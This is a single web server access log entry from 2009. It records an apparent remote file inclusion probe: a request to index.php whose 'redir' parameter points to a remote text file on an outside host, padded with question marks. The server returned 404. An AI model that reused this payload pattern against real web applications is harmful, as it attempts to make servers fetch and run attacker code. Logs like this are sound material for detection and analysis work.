114.108.177.238 - - [23/Nov/2009:02:21:43 -0800] "GET /index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
